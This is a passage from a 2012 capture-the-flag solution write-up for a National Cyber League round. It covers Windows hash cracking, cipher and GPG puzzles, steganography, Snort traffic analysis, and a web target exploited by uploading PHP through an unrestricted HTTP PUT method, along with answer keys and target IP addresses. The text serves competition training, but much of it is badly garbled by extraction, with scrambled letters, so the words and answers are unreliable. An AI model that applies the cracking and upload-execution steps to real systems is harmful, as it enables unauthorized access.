I|ag uest|ons I|ag Answers WhaL ls Lhe plalnLexL password for Lmlly Mlller's accounL? lloveyou WhaL ls Lhe plalnLexL password for 1om Anderson's accounL? assword WhaL ls Lhe plalnLexL password for Amanda Wllllams's accounL? CwerLy WhaL ls Lhe plalnLexL password for Mlchael uavls's accounL? bllnk182 WhaL ls Lhe plalnLexL password for uanlel !ameson's accounL? WhaLever WhaL ls Lhe plalnLexL password for klm !ones's accounL? assword1 WhaL ls Lhe plalnLexL password for 8randon uavldson's accounL? Welcome2 WhaL ls Lhe plalnLexL password for Aaron 8rown's accounL? caL8dog WhaL ls Lhe plalnLexL password for !ohn SmlLh's accounL? admln4you WhaL ls Lhe plalnLexL password for aLLackers accounL ([bowers)? nCL-AluP-7398 WhaL ls Lhe plalnLexL password for Lhe rooL accounL? nCL-lCCW-2309
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved Su D. W|ndows asswords
Foi the Winuows Passwoius the paiticipant was pioviueu with a uump of all of the Winuows hashes fiom the system. The playei then simply neeueu to ciack the pioviueu passwoiu hash anu submit the ciackeu passwoius as the flag.
All of the passwoius weie hasheu using the W>IV>I hash, a weak hashing system commonly founu on oluei Winuows baseu systems (though still founu touay foi backwaius compatibility). W>IV>I actually splits all passwoius into seven-chaiactei sets befoie hashing them, anu ignoies case sensitivity entiiely. Because of these factois biute foicing, oi uictionaiy testing, W>IV>I hashes is fast, efficient, anu effective.
Again, a simple passwoiu-ciacking tool like }ohn The Rippei was efficient at bieaking the passwoius. Bue to the weak ciyptogiaphy- hashing algoiithm useu, passwoiu complexity is an almost entiiely moot subject.
I|ag uest|ons I|ag Answers WhaL ls Lhe plalnLexL password for !ohn SmlLh's accounL? password WhaL ls Lhe plalnLexL password for !ames !ohnson's accounL? LurLles WhaL ls Lhe plalnLexL password for Lmlly Mlller's accounL? ralnbows WhaL ls Lhe plalnLexL password for 1om Anderson's accounL? oracle WhaL ls Lhe plalnLexL password for Amanda Wllllams's accounL? 123436 WhaL ls Lhe plalnLexL password for Mlchael uavls's accounL? greenday WhaL ls Lhe plalnLexL password for uanlel !ameson's accounL? lforgeL WhaL ls Lhe plalnLexL password for klm !ones's accounL? 8eady2go WhaL ls Lhe plalnLexL password for 8randon uavldson's accounL? ass4you WhaL ls Lhe plalnLexL password for Aaron 8rown's accounL? car2Lruck WhaL ls Lhe plalnLexL password for aLLackers accounL (nsanders)? nCL-k!Su-8930 WhaL ls Lhe plalnLexL password for Lhe AdmlnlsLraLor's accounL? nCL-PC8?-3891
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S1 L. 8as|c Cryptography
Foi each Basic Ciyptogiaphy challenge the playei was pioviueu with a file containing nothing moie than an enciypteu stiing.
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S2 The stiing is enciypteu using the Atbash ciphei, a substitution ciphei using a ieveiseu alphabet.
The ueciypteu stiing:
Another one bites the dust, you've now found three flags for the Basic Cryptography challenge, the flag is: NCL-SGOS-7428
Enciypteu by taking the stiing, conveiting to Noise coue, anu conveiting the Noise coue tones to ASCII.
The ueciypteu stiing:
Ckay, now Lhls one ls [usL Loo easy, Lhe flag ls: nCL-lAPu- 3403
S. Cha||enge I|ve
The enciypteu stiing:
O,iLimt tleeseYrexefsCta lg nl !hliNK-5ky hsFA siprat-i ilb sda h E o h etsto ai rporpycalne. o' oei: Tefa s C-UN82at G on w u tKftn BcyghhesDtst g:LM0
The stiing is enciypteu with the Railfence Ciphei, using the stanuaiu thiee-iails.
The ueciypteu stiing:
Okay, this FLAG is important - it will be used as the KEY for the next set of Basic Cryptography challenges. Don't lose it:! The flag is: NCL-KUMN-8025
As the ueciypteu stiing value states, this flag is paiticulaily impoitant. As most ciyptogiaphy systems iequiie a key, oi a shaieu seciet, it is impeiative that the playei uncoveis the key. It is this flag value that will be useu as the key, anu theiefoie be iequiieu, by most of the following flags. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved SS 6. Cha||enge S|x
The enciypteu stiing:
AJNG! Nijsbuq mgna kulqyosuk. Jigy mjtq hjqu sj aj. Sbu mgna dr ILG-UAWB-3472
This time the stiing is enciypteu with a Caesai ciphei; howevei, it is a keyeu Caesai ciphei anu theiefoie iequiies the pievious flag answei as the key.
Key:
NCL-KUMN-8025
The ueciypteu stiing:
GOAL! Another flag decrypted. Only four more to go. The flag is NCL-EGWH-3472
Foi this puzzle no key was iequiieu, at least not in the tiauitional unueistanuing of the teim key. The stiing is enciypteu with the Scytale Tool, often iefeiieu to as a Skip tiansposition ciphei.
Although no key is iequiieu a shaieu seciet is neeueu, the numbei in which to use foi the skip. In this case the numbei is simply the "flag" numbei: 7.
The ueciypteu stiing:
Hopefully that was a bit harder? What? It wasn't? The flag is: NCL-SDGK-8329 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S4 8. Cha||enge L|ght
The enciypteu stiing:
i atnheI ts -itsTn Z e rso C8 ' uoon,t-ebroh2:e hutimfnnI3HN Dayga7 Es oe'vFfeghLlh g
This stiing was enciypteu with the 0bichi, a ueiman WWI uouble columnai tiansposition ciphei.
Key:
NCL-KUMN-8025
The ueciypteu stiing:
I have to be honest, I'm running out of things to say here' The flag is: NCL-DFHE-2378
In this case the ciphei text is an ASCII-Aimoieu AES-2S6-ECB enciypteu stiing.
Key:
NCL-KUMN-8025
The ueciypteu stiing:
CreaL !ob! ?ou dld lL, you goL Lhe flnal 8aslc CrypLography challenge flag. 1hls was cerLalnly a loL harder Lhan Lhe resL. 8uL Lhe polnLs wlll be worLh your efforL. Cood luck on Lhe resL of Lhe game. 1he flag ls: nCL-k?l8-9033 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S6 I. Advanced Cryptography
Theie weie foui flags foi the Auvanceu Ciyptogiaphy section. The focus of the Auvanceu Ciyptogiaphy was specifically asymmetiic enciyption anu, fuithei, the piactical implementation anu usage of public key ciyptogiaphy.
1. uzz|es Cne, 1wo, and 1hree
Foi the fiist thiee Auvanceu Ciyptogiaphy puzzles the playei was pioviueu an aichive containing six (6) files: the public key, a coiiesponuing piivate key, a text file containing the key's passphiase, anu thiee enciypteu "flag" files.
The playei only neeueu to impoit the uPu keypaii into theii keychain, anu ueciypt each flag.
I|ag uest|ons I|ag Answers WhaL ls Lhe flrsL Advanced CrypLography flag? nCL-!kC8-8972 WhaL ls Lhe second Advanced CrypLography flag? nCL-xCCl-3487 WhaL ls Lhe Lhlrd Advanced CrypLography flag? nCL-nuSv-6482
2. uzz|es Iour and I|ve
The last two Auvanceu Ciyptogiaphy puzzles iequiie the paiticipant to biute-foice the passphiase on a uPu key, anu then utilize the key to ueciypt a flag file. All thiee files, (enciypteu flag, public key, anu piivate key) aie pioviueu.
Theie aie vaiious tools publically available to biute-foice uPu keys. The populai }ohn The Rippei tool has a "^4@Z/" veision, which incluues the ability to bieak PuPuPu Keys.
The paiticipant can naiiow theii seaich iange using a customizeu uictionaiy oi iuleset uetailing the known NCL flag foimat. With 466,976 possible passphiase combinations this biute-foice will be time intensive but it's moie than bieakable.
I|ag uest|ons I|ag Answers WhaL ls Lhe passphrase for Lhe key-palr? nCL-lSkM-7382 uslng Lhe prevlously key-palr, whaL ls Lhe flfLh Advanced CrypLography flag? nCL-!PWk-3387 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S7 G. Steganography
Theie weie a total of seven (7) Steganogiaphy challenges in the thiiu NCL iounu.
1. I|rst uzz|e
The fiist Steganogiaphy puzzle is simple, containing the flag in the image's metauata, easily obtainable fiom the file piopeities oi even simply passing the image file though the =?26)&= utility.
Flag:
NCL-LBJV-5397
2. Second uzz|e
The seconu Steganogiaphy puzzle is less tiivial. The image appeais as if it weie completely blank, puiely white. Attempts to finu the flag within the metauata woulu be fiivolous, as it is much moie simple than that.
This image actually contains the flag in white text, which is sitting against a white backgiounu. Inspection of the image will ieveal that the backgiounu is +55M+55M+55 _\`Sa anu ceitain poitions (the text) aie +53M+53M+53 _\`Sa.
A quick anu easy methou of ietiieving this flag is to use the V%&6B W%==/ tool founu in Image Euiting softwaie (like `UVE oi E1/?/=1/N). The V%&6B W%==/ will select the text, allowing the playei to altei the coloi of only the text, ievealing the flag.
Flag
NCL-JKTY-8343 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S8
3. 1h|rd uzz|e
This image contains anothei file, embeuueu using the S%??$*F?*& algoiithm. 0sing a tool like Bigital Invisible Ink the contestant coulu easily extiact the embeuueu file, which simply contains the flag value.
Flag
NCL-OCKM-4576 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved S9 4. Iourth uzz|e
This image contains anothei file, embeuueu using the S$6)D<6D* algoiithm. Again using Bigital Invisible Ink the playei can easily extiact the embeuueu file, which simply contains the flag value.
Flag
NCL-KGGS-6551 S. I|fth uzz|e
This image contains anothei file, embeuueu using the <6D*F**C algoiithm. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 6u 0nlike the pievious algoiithms, the <6D*F**C iequiies a passwoiu. In this case the passwoiu "IAW" was useu. Bigital Invisible Ink can easily extiact the embeuueu file, which simply contains the flag value.
Flag
NCL-VHGD-6581
6. S|xth uzz|e
This image contains anothei file, embeuueu using the PT)%@6BS%??$*F?*& algoiithm.
BynamicBattleSteg iequiies a passwoiu. In this case the passwoiu "IAW" was useu. Bigital Invisible Ink can easily extiact the embeuueu file, which simply contains the flag value.
Flag
NCL-GRBS-4237
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 61 7. Seventh uzz|e
The seventh anu final Steganogiaphy puzzle, anu the last flag foi Rounu S of the NCL is, by fai, the most complex.
The playei is pioviueu with an aichive containing 26 files, nameu with "SC7-" anu then a single chaiactei, "%" thiough "J."
Running the L6$* utility against all of the files will show that the files aie actually poitions of a split }PEu file. This will also ieveal that the fiist piece of the image is actually the pait labeleu "A." Reviewing the file sizes will inuicate that the poition labeleu "Z" is the last section of the image.
file * SC7-A: PC bitmap, Windows 3.x format, 1024 x 857 x 24 SC7-B: data SC7-C: data SC7-D: data SC7-E: ERROR: line 22: regexec error 17, (illegal byte sequence) SC7-F: data SC7-G: data SC7-H: data SC7-I: data SC7-J: data SC7-K: data SC7-L: data SC7-M: data SC7-N: data SC7-O: data SC7-P: data SC7-Q: data SC7-R: data SC7-S: data SC7-T: data SC7-U: data SC7-V: data SC7-W: data SC7-X: data SC7-Y: data SC7-Z: data
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-A -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-B -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-C -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-D -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-E -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-F -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-G -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-H Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 62 -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-I -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-J -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-K -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-L -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-M -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-N -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-O -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-P -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Q -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-R -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-S -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-T -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-U -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-V -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-W -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-X -rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Y -rw-r--r-- 1 user group 72758 Sep 29 17:10 SC7-Z
At this point the paiticipant likely believes the files simply neeueu to be concatenateu in alphabetical oiuei. But this will iesult in a bioken image.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 6S The bioken image uoes begin to illustiate what the enu image shoulu look like, assisting the contestant with futuie spot- checks of theii concatenateu oiueiings.
0ne solution to finuing the piopei oiueiing is tiial anu eiioi, anothei sciipting, enumeiating thiough all of the possible combinations.
The oiueiing, howevei, is actually logical, anu not ianuom.
Files "A" thiough "N" aie the even numbeieu files.
Files "N" thiough "Z" aie the ouu numbeieu files.
A = Part 0 B = Part 2 C = Part 4 D = Part 6 E = Part 8 F = Part 10 G = Part 12 H = Part 14 I = Part 16 J = Part 18 K = Part 20 L = Part 22 M = Part 24 N = Part 1 O = Part 3 P = Part 5 Q = Part 7 R = Part 9 S = Part 11 T = Part 13 U = Part 15 V = Part 17 W = Part 19 X = Part 21 Y = Part 23 Z = Part 25
Now that the paiticipant has the image put back togethei, theie is still the mattei of the embeuueu file. That's iight, this challenge is not ovei yet.
}ust like all of the pievious Steganogiaphy puzzles this ones also has a hiuuen flag within.
This pictuie of a puzzle has anothei file embeuueu within using the PT)%@6BS%??$*F?*& algoiithm. Again using "NCL" as the passwoiu. The embeuueu file is actually anothei white-text on white-backgiounu image.
Flag
NCL-KLMG-8245 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 6S V. NCL Champ|onsh|p
The 2u12 Championship foi the National Cybei League inviteu the top ten playeis fiom each confeience ovei the couise of the pievious thiee iounus.
This final championship iounu incluueu all of challenges that weie not solveu uuiing the pievious iounus.
In auuition to the pievious puzzles two new challenges weie intiouuceu within the Web Exploitation anu Netwoik Bata Analysis sections.
A. I|ags Name Server
Value What is the MD5 flag found on Target 1? 54.243.211.149 (Web Exploitation - Target 1) 2500 What is the MD5 flag found on Target 2? 184.72.228.85 (Web Exploitation - Target 2) 5000 What is the first flag found on Target 3? 184.72.228.91 (Web Exploitation - Target 3) 1000 What is the second flag found on Target 3? 184.72.228.91 (Web Exploitation - Target 3) 1000 What is the third flag found on Target 3? 184.72.228.91 (Web Exploitation - Target 3) 1000 What is the fourth flag found on Target 3? 184.72.228.91 (Web Exploitation - Target 3) 1200 What is the fifth flag found on Target 3? 184.72.228.91 (Web Exploitation - Target 3) 1300 What snort SID fired on traffic at 05/29-14:44:02.433544? 127.0.0.4 (Network Data Analysis)
500 What is the IP address of the attacker? 127.0.0.4 (Network Data Analysis)
500 What service is the victim running? (Vendor Product) 127.0.0.4 (Network Data Analysis)
500 What URI was the attacker attempting to access? 127.0.0.4 (Network Data Analysis)
1000 What CVE is being exploited? 127.0.0.4 (Network Data Analysis)
5000 What is the plaintext password for John Smith's account? 127.0.0.5 (Linux Passwords)
1000 What is the plaintext password for attackers account (jbowers)? 127.0.0.5 (Linux Passwords)
2500 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 66 Name Server
Value What is the plaintext password for the root account? 127.0.0.5 (Linux Passwords)
2500 What is the flag for the fifth Basic Cryptography puzzle? 127.0.0.6 (Basic Cryptography)
300 What is the flag for the eighth Basic Cryptography puzzle? 127.0.0.6 (Basic Cryptography)
700 What is the flag for the ninth Basic Cryptography puzzle? 127.0.0.6 (Basic Cryptography)
900 What is the passphrase for the key-pair? 127.0.0.7 (Advanced Cryptography)
5000 Using the previous key-pair, what is the fifth Advanced Cryptography flag? 127.0.0.7 (Advanced Cryptography)
5000 What is the flag found in the third Steganography challenege? 127.0.0.8 (Steganography)
300 What is the flag found in the fourth Steganography challenege? 127.0.0.8 (Steganography)
300 What is the flag found in the fifth Steganography challenege? 127.0.0.8 (Steganography)
500 What is the flag found in the sixth Steganography challenege? 127.0.0.8 (Steganography)
500 What is the flag found in the seventh Steganography challenege? 127.0.0.8 (Steganography)
5000
8. Network Data Ana|ys|s
}ust like the pievious Netwoik Bata Analysis, the playei simply neeueu to analyze the tiaffic with a tiaffic analyzei; howevei this time auuitional analysis anu ieseaich neeueu to be peifoimeu on the finuings.
I|ag uest|ons I|ag Answers WhaL snorL Slu flred on Lrafflc aL 03/29- 14:44:02.433344 2464 WhaL ls Lhe l address of Lhe aLLacker? 172.16.4.117 WhaL servlce ls Lhe vlcLlm runnlng? (vendor roducL) Apache 1omcaL WhaL u8l was Lhe aLLacker aLLempLlng Lo access? /webdav/examples/SendMallSer vleL WhaL CvL ls belng explolLed? CvL-2007-3383
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 67 C. Web Lxp|o|tat|on - 1arget 1hree
This Web Application simply uisplays a uiiectoiy listing.
Navigating to the "L$%&O,!"N1N" file simply uisplays an eiioi message:
Try Again
uoing to the "N4?"N1N" ietuins a 4uS BTTP Eiioi (Nethou Not Alloweu) anu pioviues a textual eiioi:
Error: Invalid Method
Knowing the funuamentals of BTTP the eiioi message anu file name shoulu have pioviueu ample hints, but if those faileu most web vulneiability scanneis (like I6C?/) woulu also uncovei the fact that the web seivei accepts P0T iequests, allowing an attackei to uploau files to the web seivei uniestiicteu.
0nuei noimal ciicumstances the attackei coulu manually launch the P0T iequest utilizing a socket tool like )*?B%?, in this case fuithei steps must be taken as BTTPS is in use. Theiefoie the paiticipant will neeu to use anothei tool oi methou to execute the BTTP P0T iequest against the seivei. Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 68 0ne such useful tool is the E/=?*2 Fiiefox Auu-0n. Postei allows the usei to manipulate BTTP iequests as neeueu anu allows common anu custom BTTP Request Nethous.
The playei is able to cleaily confiim they have the ability to uploau anu execute PBP coue.
Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 69 At this point the playei neeus to uploau a set of PBP instiuctions that will allow them to ieau the contents of flag_u1.php.
Looking at the souice of the ietuineu page will ieveal the fiist flag.
<? echo "Try Again"; // NCL-JOFW-9345 ?>
Now the contestant neeus to finu foui othei flags, but theie aien't any hints to inuicate wheie the flags may be. Seaiches of the web uiiectoiies will show that theie aie no flags theie. A simple L6)D oi $/B%?* shoulu uo the tiick. The $/B%?* Linux utility is gieat at quickly finuing files that contain a paiticulai name anu, baseu on the initial flag's file name, it's a wise iuea to seaich foi the teim "L$%&."
Retuining: Flag02: NCL-ONGD-0832 Flag03: NCL-HSFH-8943 Foi Public Release
Copyright 2012 iSIGHT Partners SM - All Rights Reserved 7u The fouith anu fifth flags have a familiai extension. ASC being ASCII aimoieu enciypteu output fiom uPu. In fact it seems theie is a binaiy veision of the same file enuing in uPu. This will not be as simple as outputting the file, A quick listing of the ioot level uiiectoiy contents will suiely ieveal some useful infoimation.
total 116 drwxr-xr-x 23 root root 4096 Nov 23 18:41 . drwxr-xr-x 23 root root 4096 Nov 23 18:41 .. drwxr-xr-x 2 root root 4096 Oct 12 16:46 bin drwxr-xr-x 3 root root 4096 Oct 12 16:48 boot drwxr-xr-x 12 root root 3880 Dec 20 06:35 dev drwxr-xr-x 89 root root 4096 Dec 20 06:35 etc -rw-r--r-- 1 root root 580 Nov 23 18:40 flag_04.txt.asc -rw-r--r-- 1 root root 357 Nov 23 18:39 flag_04.txt.gpg -rw-r--r-- 1 root root 742 Nov 23 18:41 flag_05.tgz.asc -rw-r--r-- 1 root root 476 Nov 23 18:41 flag_05.tgz.gpg -rw-r--r-- 1 root root 3501 Nov 23 18:38 gpg.key drwxr-xr-x 3 root root 4096 Apr 24 2012 home lrwxrwxrwx 1 root root 33 Apr 24 2012 initrd.img drwxr-xr-x 18 root root 4096 Oct 12 16:46 lib drwxr-xr-x 2 root root 4096 Oct 12 16:45 lib64 drwx------ 2 root root 16384 Apr 24 2012 lost+found drwxr-xr-x 2 root root 4096 Apr 24 2012 media drwxr-xr-x 3 root root 4096 Oct 17 11:40 mnt drwxr-xr-x 2 root root 4096 Apr 24 2012 opt dr-xr-xr-x 81 root root 0 Dec 20 06:33 proc -rw-r--r-- 1 root root 4941 Nov 23 18:38 pub.key drwx------ 4 root root 4096 Dec 1 21:46 root drwxr-xr-x 16 root root 600 Dec 20 15:18 run drwxr-xr-x 2 root root 4096 Oct 12 16:47 sbin drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux drwxr-xr-x 2 root root 4096 Apr 24 2012 srv drwxr-xr-x 13 root root 0 Dec 20 06:33 sys drwxrwxrwt 2 root root 4096 Dec 20 15:17 tmp drwxr-xr-x 10 root root 4096 Apr 24 2012 usr drwxr-xr-x 13 root root 4096 Dec 1 22:00 var lrwxrwxrwx 1 root root 29 Apr 24 2012 vmlinuz
The contestant shoulu hopefully notice the two uPu ielateu files, &N&"C*T anu N4Z"C*T. At that point the playei can uownloau anu impoit the keys (which have no passphiase), ueciypting the fouith anu fifth flag.
I|ag uest|ons I|ag Answers WhaL ls Lhe fourLh flag found on 1argeL 3? nCL-nlu!-4726 WhaL ls Lhe flfLh flag found on 1argeL 3? nCL-LCnk-4237